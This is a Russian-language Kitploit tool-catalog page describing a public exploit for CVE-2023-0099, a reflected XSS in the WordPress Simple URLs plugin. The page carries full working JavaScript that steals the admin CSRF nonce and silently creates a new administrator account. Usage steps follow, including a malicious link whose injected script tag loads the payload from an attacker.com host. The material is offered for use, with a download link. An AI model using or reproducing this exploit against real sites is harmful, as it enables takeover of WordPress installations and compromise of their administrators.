Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-0099-exploit — простые URL < 115 - Отражённый XSS | Kitploit
Инструменты/GitHubGitHub/amirzargham/cve-2023-0099-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

простые URL < 115 - Отражённый XSS

Репозиторий
61212 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-0099-эксплойт

Название эксплойта: simple urls < 115 - Reflected XSS

Google Dork:

Автор эксплойта: AmirZargham

Домашняя страница вендора: https://getlasso.co/

Ссылка на ПО: https://wordpress.org/plugins/simple-urls/

Версия: < 115

Протестировано на: firefox, chrome

CVE: CVE-2023-0099

CWE: CWE-79

Платформа: MULTIPLE

Тип: WebApps

Описание Плагин Simple URLs для WordPress до версии 115 не очищает и не экранирует некоторые параметры перед выводом их на некоторых страницах, что приводит к отражённому Cross-Site Scripting (XSS), который может быть использован против привилегированных пользователей, таких как администраторы.

Эксплойт:

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

Информация об использовании:

  1. сохраните код эксплойта на сервере как файл javascript.
  2. в файле эксплойта измените значения:
    • user_login: Произвольное имя пользователя
    • pass1: Произвольный пароль
    • pass2: Произвольный пароль
    • email: Произвольный адрес электронной почты
  3. теперь отправьте вредоносную ссылку жертве: https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. теперь, когда пользователь-администратор создан, перейдите на /wp-admin или аналогичную страницу и войдите в панель WordPress.

Опубликовано в: exploit-db.

Опубликовано в: 0day.today.

Опубликовано в: packet storm.

Скачать инструмент